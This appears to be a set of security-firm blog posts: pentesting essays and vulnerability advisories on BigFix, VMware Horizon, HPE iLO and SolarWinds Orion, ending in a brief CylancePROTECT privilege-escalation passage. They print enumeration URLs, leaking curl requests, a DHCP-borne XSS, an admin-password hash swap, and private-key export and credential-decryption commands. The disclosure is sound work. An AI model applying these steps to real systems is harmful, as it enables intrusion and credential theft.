Use the Source, Luke

Your pentesters should be asking for source code. And you should probably be sharing it.

One of my favorite things about working at Atredis Partners is that part of our research-centric model includes throwing folks at all kinds of targets that they've never seen before. First chairs on projects are always going to be in their comfort zone, but for second chairs, we like to mix things up a bit, because it helps folks grow and we often find new ways of looking at things that we've collectively looked at the same way for years.

This not only means that folks from traditional pentesting backgrounds get to grow into doing things like hardware or mobile hacking, it also means that I get to watch people with backgrounds in say, reverse engineering or exploit development take a look at a network perimeter or a web app, which yields some great new perspectives.

Last week, I was on an internal kickoff call for what was ostensibly an assessment of an API on a public webserver. There were some other targets that were more complex than that, but for this part of the call, we were discussing testing the API. Two people on the team were coming at the target from a more bughunting-centric background, and were asking about how we'd be testing.

"So, are they gonna give us source code?"

"Probably not, they seemed pretty cagey about it. I can ask again, though..."

"That's stupid."

"I mean, I guess it kinda is. A lot of times we'll just get say, API docs, and some example code, maybe cobble together an API client to throw traffic at it, tool around with requests in Burp, that sort of thing."

"How about shell access to the server while you're testing so you can debug?"

"Uh, I dunno, like I said, these folks were pretty cagey about sharing much beyond access to the API itself."

"Jeez. Well, I guess they don't want us to find anything."

I was a bit dumbstruck at first, because a lot of the time, that's all you'll get for a web app or web services assessment, a couple of logins, maybe a walkthrough of the app, and then, well, yeah, actually... Good luck finding anything. It was a useful reminder how wrongheaded it is to be on the hook for finding all the bugs in something without source code.

We do ask for source, and shell access, for pretty much any software assessment we do. But we often get told no. Even more often than that, the client tells us "nobody's ever asked me that before."

And that is dumb.

Runtime testing alone is absolutely not the right way to find the most bugs possible, in the least amount of time, in pretty much any target. It's a way to find an opportunistic subset of the bugs that are floating at or very near the surface.

How likely is runtime testing to find more complex bugs several layers deep in the app, or that are only exploitable in a very narrow window in-session? What about finding the ten other places you're vulnerable to SSRF, all of which require a more complex trigger than the single case your tester found at runtime? How likely are your devs to fix every vector, when they only know about one? And how likely is it that a dev will find a way down the road to expose the other ten?

Source allows you to identify all kinds of systemic problems in an application that you just don't see when you're flinging yourself willy-nilly at a web interface or web service, or any software target, really. It allows you to confirm runtime findings and weed out false positives, and follow the bugs you found at runtime down into the bowels of the broken function or ugly third party library that spawned them.

So why don't more folks do source-driven or source-assisted pentests?

Well, for one thing, a lot of pentesters out there can't read the source in the first place, so it wouldn't help them much. You need more seasoned people, typically with some dev experience, to get any value out of sharing your source code. The last thing you want is a mountain of crappy informational bugs that somebody lifted from whole cloth out of a source code scanner report, trust me.

And yes, of course, there are the IP concerns. I get that. Folks will tell us their source code contains trade secrets, it's sensitive, it's HIPAA protected, it's export controlled, it's buried underground and written on stone tablets, etc, etc. I don't see IP problems as particularly insurmountable. They can be odious, sure; we've flown overseas to look at code that couldn't leave a building, we've had devs scroll through source over Skype, sat in a locked room auditing source on client-provided systems with cameras on us, you name it. There are ways to give access to source in a controlled fashion, if source code leaving the building is a concern.

A third reason, related to the above, and I think the biggest one, is that it's more work for the testing team and for the client. The testing team has to add source review to their workflow, map the bugs they found at runtime back to source, and chase down bugs found in source to see if they're exploitable in the wild. On the client end, the client has to go wrangle devs for repo access (which the internal security team often doesn't even have themselves) and often has to figure out either how to get the testing team inside the corporate LAN, or how to schlep a 120MB tarball over to the tester.

It's far easier to just re-enable the "pentester1" and "pentester2" accounts from last year's test and get back to reading /r/agedlikemilk (which is pretty funny, to be fair). Besides, you're probably just going to rotate firms next year, so what's the point?

Seriously folks, if you have an in-house developed app, especially if it's part of your core business, you're wasting time on "black box" testing. Give your testing team full source access and full transparency, and they'll find bugs that have been missed by other teams doing runtime testing for years. I know this, because we do, every time a client takes us up on the request.

While I'm at it, let's dispense with the old saw that black box testing is so you can see "how long a real hacker would take to break this"... "Real" hackers get to take as long as they need to until they land a shell, plus they get to wear sunglasses, a hoodie and a ski mask while they do it. I have yet to have a client offer our team the luxury of unlimited time, and ski masks tend to make for awkward video calls with the CSO.

CVE-2019-4061: Harvesting Data from BigFix Relay Servers

External security assessments are one of my favorite parts of working at Atredis. I love the entire process, from sifting through mountains of data to identify the customer’s scope to digging deep into commercial products that we find deployed on the perimeter, it is challenging work and a lot of fun.

A recent service of interest was an externally-exposed IBM BigFix Relay Server. This service provides a HTTP-over-TLS endpoint on TCP port 52311 that enables system administrators to deploy patches to devices outside their firewall, without forcing the use of a VPN. This is great when an update needs to be deployed that involves the VPN itself, but can be problematic from a security perspective.

After identifying an external BigFix Relay Server, Chris Bellows, Ryan Hanson, and I started to dig into the communications protocol between the relay and the client-side agent. We found that unauthenticated agents could enumerate and download almost all deployed packages, updates, and scripts hosted in the BigFix environment. In addition to data access, we also found a number of ways to gather information about the remote environment through the relay service.

The TL;DR of our advisory is that if BigFix is used with an external relay, Relay Authentication should be enabled. Not doing so exposes a ridiculous amount of information to unauthenticated external attackers, sometimes leading to a full remote compromise. Also note than an attacker who has access to the internal network or to an externally connected system with an authenticated agent can still access the BigFix data, even with Relay Authentication enabled. The best path to preventing a compromise through BigFix is to not include any sensitive content in uploaded packages. IBM also addresses this issue on the PSIRT blog.

BigFix uses something called a “masthead” to publish information about a given BigFix installation. The masthead is available on both normal and relay versions of BigFix at the URL https://[relay]:52311/masthead/masthead.axfm.

The masthead includes information such as the server IP, server name, port numbers, digital signatures, and license information, including the email address of the operator who licensed the product. This information can be immediately useful on its own, but its just the tip of the iceberg.

BigFix uses a concept called Sites to organize assets. A full index of configured Sites can be obtained through the URL https://[relay]:52311/cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands. This site listing provides deep visibility in the organization’s internal structure.

Going further, an attacker can obtain a list of package names and versions by requesting the URL https://[relay]:52311/cgi-bin/bfenterprise/BESMirrorRequest.exe. This tells an attacker exactly what versions of what software are installed across the organization. The package list is split into specific Actions, which each have the following format:

Action: 21421

url 1: http://[BigFixServer.Corporate.Example]:52311/Desktop/CreateLocalAdmin.ps1

url 2: http://[BigFixServer.Corporate.Example]:52311/Desktop/SetBIOSPassword.ps1

In order to download package contents from a relay, the package must first be refreshed in the mirror cache. This can be accomplished by requesting URL ID "0" of the Action ID in the URL https://[relay]/bfmirror/downloads/[action]/0

Once the data has been cached, individual sub-URLs may be downloaded by ID https://[relay]/bfmirror/downloads/[action]/1

Automating the process above is straightforward and allows an attacker to obtain copies of the published packages. As hinted above, sometimes these packages include sensitive data, and sometimes this data can be used to directly compromise the organization.

In order to determine how common this issue was, we conducted an internet-wide survey of the IPv4 space, looking for the BigFix masthead file on externally exposed relay servers. Of the ~3.7 billion addressable IPv4 addresses, we found almost 1,500 BigFix Relay servers with Relay Authentication disabled. This list included numerous government organizations, large multinational corporations, health care providers, universities, insurers, major retailers, and financial service providers, along with a healthy number of technology firms. For each identified relay, we queried the masthead and obtained a package list, but did not download any package data.

Shortly after conducting the survey, we reached out to the BigFix product team to start the vulnerability coordination process. The BigFix team has been great to work with; quick to respond and interested in the best outcome for their customers. Over the last three months, the BigFix team has improved their documentation and notified affected customers. As of March 18th, that process has been completed.

In total, our survey found 1,458 exposed BigFix Relay Servers, with versions 9.5.10.79, 9.5.9.62, and 9.5.8.38 being the most common. Looking at just “uploaded” packages (custom things uploaded into BigFix by operators), we identified over 25,000 unique files.

Quite a few of these uploaded files appear to contain sensitive data based on the filename.

Encryption and authentication keys

bitlockerADkey.ps1

SSH_KEYtar.tmp

AES.key

_BC4Key.txt

Scripts to set the administrator password

secChangeadminpsw.bat

localadmin_pw.bat

AddWorkstationAdmins.bat

AdminPassword.exe

change_admin_password.exe.tmp

SetConfigPasswordRemote.vbs

In summary, anyone using BigFix with external Relay Servers should enable Relay Authentication as soon as possible. All BigFix users should review their deployed packages and verify that no sensitive information is exposed, including encryption keys and scripts that set hardcoded passwords. Finally, for folks conducting security assessments, keep an eye out for port 52311 on both internet-facing and internal networks.

-HD

CVE-2019-5513: Information Leaks in VMWare Horizon

The VMWare Horizon Connection Server is often used as an internet-facing gateway to an organization’s virtual desktop environment (VDI). Until recently, most of these installations exposed the Connection Server’s internal name, the gateway’s internal IP address, and the Active Directory domain to unauthenticated attackers.

Information leaks like these are not a huge risk on their own, but combined with more significant vulnerabilities they can make a remote compromise easier. I love these kinds of bugs because they provide a view through the corporate firewall into the internal infrastructure, providing insight into naming and addressing conventions.

The Atredis advisory and the VMWare advisory are now online and contain additional details about the the issues and available fixes.

Testing for these issues is straight-forward; the following request to the /portal/info.jsp endpoint will return one or more internal IP addresses along with a version number:

$ curl https://host/portal/info.jsp
{"acceptLanguage":"en-US","clientVersion":"4.9.0","logLevel":"2","clientIPAddress":"192.168.0.12, 192.168.30.45","contextPath":"/portal","feature":{},"os":"unknown","installerLink":"https://www.vmware.com/go/viewclients"}

A POST request to the /broker/xml endpoint returns the broker-service-principal element in the XML response, which contains the service account name (machine account typically) the domain name:

$ curl -k -s -XPOST -H 'Content-Type: text/xml' https://host/broker/xml --data-binary $'<?xml version=\'1.0\' encoding=\'UTF-8\'?><broker version=\'10.0\'><get-configuration></get-configuration></broker>'

<broker-service-principal>
<type>kerberos</type>
<name>HORIZONSERVER$@CORPORATEDOMAIN.EXAMPLE.COM</name>
</broker-service-principal>
</configuration>
</broker>

We would like to thank the VMware Security Response Center for their pleasant handling of this vulnerability report and their excellent communication. VMWare noted that this issue was also independently reported by Cory Mathews of Critical Start.

CVE-2018-7117: A Somewhat Accidental XSS in HPE iLO

INTRODUCTION

At Atredis Partners, we often use dedicated lab networks for testing devices. This helps isolate these devices from "production" networks, and affords us the opportunity to monitor all network communications to/from the device as well as conduct interesting attacks. In this post, we'll briefly discuss a somewhat unexpected find shortly after plugging in an enterprise-grade server during an engagement a few months ago.

(You can also jump straight to the advisory we released today)

THE DEVICE AND THE BUG

I'd like to tell you this was some unique, esoteric device with some incredibly amazing, difficult-to-find, l33t bug ... but I'd be lying. Instead, this device was an HPE ProLiant DL380 Gen10 server, which is fairly common in many enterprise environments; and the bug was ... Cross-Site Scripting.

Now, before the XSS is lame chest-beating begins, bear in mind this bug was found not in a web application running on the host operating system, but rather in the Integrated Lights-Out (or "iLO") side of things. For those unfamiliar, HPE iLO allows system and network administrators the ability to manage and monitor servers through a separate, dedicated network interface, API, and UI. Typical iLO capabilities include, but are not limited to, checking system hardware health, managing device power options (including turning the device on/off), mounting drive images, and even a remote console (although some "enhanced" versions of iLO further restrict access to this and other features).

Once the server was hooked up to the lab network and ready to go, we began poking and prodding all over the place, including the iLO web UI. After logging in and browsing around, familiarizing ourselves with the interface, identifying input points, etc., my colleague messaged me, asking "Did you do this?":

xss-1.png

Admittedly, I was a bit amused by this whole thing because 1) it was a bit of an unexpected discovery and 2) the lab network is configured to "automagically" help test for this and other, similar issues, so it's become almost hands-off or even second nature.

I quickly realized this was the result of how this lab network's DHCP server was configured -- providing different values for DHCP options so as to identify (and even trigger) XSS, command injection and the like in vulnerable clients.

Digging in a wee bit further, we realized it was the domain name (DHCP option 15) that was being rendered unsanitized in the iLO web UI.

xss-3.png

We adjusted the DHCP server configuration to do a bit more than just alert(1), and forced the iLO to pull a new lease, resulting in:

xss-2.png

IMPACT AND OTHER CONSIDERATIONS

While DHCP-provided "domain name" could contain a simple HTML <script> tag with a JavaScript alert box in the authenticated user's browser, an attacker could also specify an external JavaScript resource, providing greater opportunities and capabilities.

That said, there are some things to think about in terms of the real world impact here.

For starters, security best practices, including those straight from HPE, dictate that out-of-band management networks should be connected to a "dedicated management network that is isolated from the production network", though this may not always be implemented correctly, if at all. This means that an attacker would need to be network-adjacent to the target(s), either by gaining a foothold on a device connected to that network and/or by way of a rogue insider, in order to spin up a specially configured DHCP server.

Second, at least for this specific issue, the target iLO(s) would need to be configured to use DHCP, although this is the default.

Third, although slightly less important, egress filtering rules would potentially need to allow devices in the management network to contact external hosts, i.e. to pull external JavaScript and/or exfiltrate data. I say "slightly less important" because it isn't out of the realm of possibility to host JavaScript resources on/transmit captured data within the management network itself, assuming the attacker already has a foothold there.

CONCLUSION

Belated TL;DR: don't underestimate the power of having a lab environment configured for identifying these kinds of injection issues from the get-go, as you never know what you may find, even in what may seem to be an otherwise robust and "secure" platform.

For those who want to perform this kind of testing themselves, there are myriad ways to do so, such as simply configuring your DHCP server-of-choice to dole out "malicious" values in DHCP options, or using freely available tools (or writing your own) to handle the task. The latter could be anything from a Metasploit module to a modified version of pydhcp.

Fun with SolarWinds Orion Cryptography

Introduction

We run into a wide variety of network management solutions during our security assessments and penetration tests. The SolarWinds Orion product suite in particular is popular with network administrators and IT teams of all sizes. The Orion platform includes modules such as the Network Engineers Toolkit, Web Performance Monitor, and Network Configuration Management, among many others. We found some fun ways to abuse this product during security tests and wanted to share our notes with the community.

The Orion product uses a Microsoft SQL Server backend to store information about user accounts, network devices, and the credentials used to manage these devices. An Orion system used to manage a large network will typically use a standalone SQL Server installation, while smaller networks will use a local SQL Server Express instance. Since the Orion server houses credentials and can often be used to push and pull network device configurations, it can be a gold mine for expanding access during a penetration test.

Gaining access to the web console without a login

The Orion product is typically managed from the web console; this can use a local account database or an existing Active Directory service. An attacker can then monitor network traffic between the Orion server and a separate SQL Server instance, extracting hashed user passwords and encrypted network device credentials. An attacker that can man-in-the-middle the SQL Server communication can use this to login to the Orion web console with an arbitrary password by replacing the password hash when the web server queries the Accounts table during login. If direct access to the SQL Server database for Orion is possible, a modification to the Accounts table will allow for easy access to the console. If the attacker has local administrator access to the Orion server, they can modify the Accounts table using the Orion Database Manager GUI application. Regardless of how an attacker gains access to the Accounts table, the easiest approach to gaining access is to backup the existing hash, then replace the PasswordHash column for an enabled administrative user.  An empty PasswordHash for the "admin" user account corresponds to the following string:"

/+PA4Zck3arkLA7iwWIugnAEoq4ocRsYjF7lzgQWvJc+pepPz2a5z/L1Pz3c366Y/CasJIa7enKFDPJCWNiKRg==

Note that this password hash is only valid for the "admin" user (see notes below on salting). The screenshot below shows the SQL query to reset the "admin" account to the empty password, using the SolarWinds Database Manager GUI (via local administrator access over Remote Desktop).

Replace_PasswordHash.png

Once the PasswordHash has been replaced (or temporarily intercepted), the attacker can login with an empty password for the associated user account.  

 

SolarWinds Orion "Accounts" table password hashing

Orion password hashing is a variant of a salted SHA512 hash. The hash is computed by first generating a salt that consists of the lowercase username. If the salt is less than 8 bytes long, it is appended with bytes from the string "1244352345234" until it is 8 bytes. For example, the salt for username "ADMIN" would become "admin124", while the salt for "Bo" would become "bo124435". Once the salt has been calculated, a RFC2898 PBKFD2 is generated using the default iteration count of 1000 and the SHA1 hash algorithm. Finally, a SHA512 hash of the PBKDF2 output is taken and encoded using Base64. It doesn't appear that any existing tools support cracking passwords in this format, but Hashcat comes close with PBKDF2-HMAC-SHA1(sha1:1000) support, and is only missing the final call to SHA512(). This hashing function has been implemented in the Ruby script hash-password.rb.

 

Harvesting stored network credentials from the database

SolarWinds Orion stores network credentials within the SQL Server database tables. Some of these credentials, such as SNMP v1/v2c community strings, are stored in clear-text, while most are encrypted using a RSA key located in the Orion server local certificate store. Network credentials can be harvested from the database through passive monitoring or active exports, in the latter case, either using standard SQL Server management tools, or if local administrator access has been obtained on the Orion server, using the Database Manager GUI application. A partial list of tables that should be exported to collect credentials includes:

  • Accounts (Username, PasswordHash)

  • Credential (ID, Name)

  • CredentialProperty (ID, Name, Value)

  • Nodes (IPAddress, Community, RWCommunity)

  • NCM_Nodes [View] (Name, Username, Password , EnableLevel , EnablePassword)

  • NCM_GlobalSettings (SettingName, SettingValue)

  • NCM_NodeProperties (Username, Password, EnableLevel, EnablePassword)

  • NCM_ConfigSnippets (AdvancedScript)

  • NCM_ConnectionProfiles (Name, Username, Password, EnableLevel, EnablePassword)

  • SSH_Sessions (HostName, Username, Password)

  • SSO_Tokens

  • Traps (Community)

  • Traps (CommunityStrings (Community)

Decrypting stored network credentials

Network credentials stored within the SQL Server database are encrypted with a RSA key located in the local machine certificate store of the Orion server. For most SQL tables, these credentials are prefixed with the string "SWEN__", while the SSH sessions table uses a raw form without the prefix. To decrypt these credentials, the RSA key for the SolarWinds-Orion certificate must be exported from the system. This typically requires local administrator access and an elevated command shell on the Orion server. To export the key, use certutil:

C:\Temp> certutil -exportPFX -p Atredis my SolarWinds-Orion orion.pfx
my "Personal"
================ Certificate 0 ================
Serial Number: c0e0b5d49a84818048d614012d6c7497
Issuer: CN=SolarWinds-Orion
 NotBefore: 10/21/2018 6:26 PM
 NotAfter: 12/31/2039 6:59 PM
Subject: CN=SolarWinds-Orion
Signature matches Public Key
Root Certificate: Subject matches Issuer
Cert Hash(sha1): e60003315dd42f55adeb7f4c2071b6e9bc9dd996
  Key Container = 9292e92a-9fb9-4881-94cd-c8c582550268
  Unique container name: 7f96c35203d32d4fae1724bb52f38232_c5c554db-595b-4464-ac33-102a5379ad51
  Provider = Microsoft Strong Cryptographic Provider
Encryption test passed
CertUtil: -exportPFX command completed successfully.

If an error is returned stating “Keyset does not exist”, this typically means that the command was not run as an administrative user with elevated privileges. If certutils does not work for some reason, or if the cert has been marked unexportable, you can still export the private key using Jailbreak or Mimikatz.

Next, the PFX needs to be converted to a standard OpenSSL PEM file. The openssl command handles this with the following syntax: 

C:\Temp> openssl pkcs12 -in orion.pfx -out orion.pem -nodes -password pass:Atredis

Using the clear-text orion.pem file, the credentials in the exported database tables can be decrypted using the ruby scripts; decrypt-swen-credentials.rb and decrypt-ssh-sessions.rb. These scripts will read the RSA key from “orion.pem” and decrypt credentials found in all files passed as arguments, saving the results to files with the “.dec” extension. the Database Manager GUI includes a handy “Export to CSV” button that simplifies this process. The decrypt-ssh-sessions.rb script looks for the password fields in the SSHSessions table, which does not use the “SWEN” prefix. The following example demonstrates using the decrypt-swen-credentials.rb script against an export of the NCM_GlobalSettings table.

$ ruby decrypt-swen-credentials.rb NCM_GlobalSettings.csv 
$ cat NCM_GlobalSettings.csv.dec
"SettingName","SettingValue"
"GlobalConfigRequestProtocol","SNMP"
"GlobalConfigTransferProtocol","TFTP"
"GlobalEnableLevel","enable"
"GlobalEnablePassword","ubersecret!"
"GlobalExecProtocol","SSH auto"
"GlobalPassword","secret!"
"GlobalSSHPort","22"
"GlobalTelnetPort","23"
"GlobalUsername","solarwinds"

Conclusion

The SolarWinds Orion platform is a lot of fun for penetration testers, as it can act as a credential store, configuration management system, and remote command execution platform, depending on what modules are configured. As an added bonus, highly segmented networks often whitelist their network monitoring servers, making the SolarWinds server an attractive target for lateral movement. Although the password hashing and credential encryption is relatively sane from a security standpoint, they can be abused with the right tools. I hope the information above is useful and convinces you to pay special attention to network monitoring applications on your next penetration test.

-HD

Revolving Door Pentesting

I recently had a client ask me if it makes sense to rotate security testing firms. "It's something I've always done, but I'm not sure if it really works or not."

I said in my experience, it doesn't really work very well at all.

I run into it less now than I did ten years ago, but there are still quite a few folks out there using a different firm for each annual pentest, or who never use the same firm on the same target more than once and keep a rotating roster of firms in the hopper.

What blows my mind about the whole switch-vendors-every-year mentality is that it's built around the presumption that most pentesters are terrible (plausible, in some cases) and are only going to try hard when you're a new client. There's also a perception that there's no value in building an ongoing relationship with a firm, since everyone does the same things, in the same order, to the same target every time.

On any of our engagements, the first time we look at a given target, we have to ramp up and learn everything we can about it: what mistakes your developers are more prone to make, what misconfigurations you made in your EDR deployment, how to keep from knocking the staging environment offline, which sysadmin knows how to bring it back up. The list goes on and on.

The early phases of a new assessment for a new client are a lot like the first few days on the job for a new employee. You won't really see productive results until they've learned the ropes a bit and have a handle on how things work (and don't work) in your environment.

You need to keep working with a pentest firm once they've ramped up on your environment for the same reason you need to keep employees: they've learned valuable things that someone new would have to relearn, and that's a poor use of time and resources if you have a seasoned person on hand to do the job.

When they wrap that first gig, a good pentester is already thinking about different and better ways to go after the target next time.

On the other side of things, if you're rotating firms over and over, and you don't see any value in follow-on projects, maybe you're not investing in the relationship yourself. Heck, maybe you don't even want to, maybe you just want another annual rotated-firm rubber-stamp assessment to keep the auditors happy. Maybe you're even cynical enough to admit that if you let the same firm hit the same targets two years in a row somebody would finally figure out how to get past the WAF and then you'd have a lot more work to do.

I've had people proudly say to me, "we have new people hit this every year and they find the same bugs". What they don't seem to understand is that it also follows that if you use the same people again, they'll most likely find new bugs. Or, if you really need "fresh eyes", use different resources from a firm you already trust.

To me, the goal of pentesting is to push things forward, or it should be: to iteratively test and improve a little each time, both as attackers and defenders. The best way to do that is to get attackers and defenders collaborating. Building a longstanding working relationship is a great way to do that.

Escalating Privileges with CylancePROTECT

Escalating Privileges with CylancePROTECT

CylancePROTECT contains a privilege escalation vulnerability due to the update service granting Users Modify permissions on the log folder, as well as any log file it writes. This allows any user to empty the folder and use it as a Mount Point, which can be combined with a Symbolic Link to create an arbitrary file with Modify permissions when a new log file is created.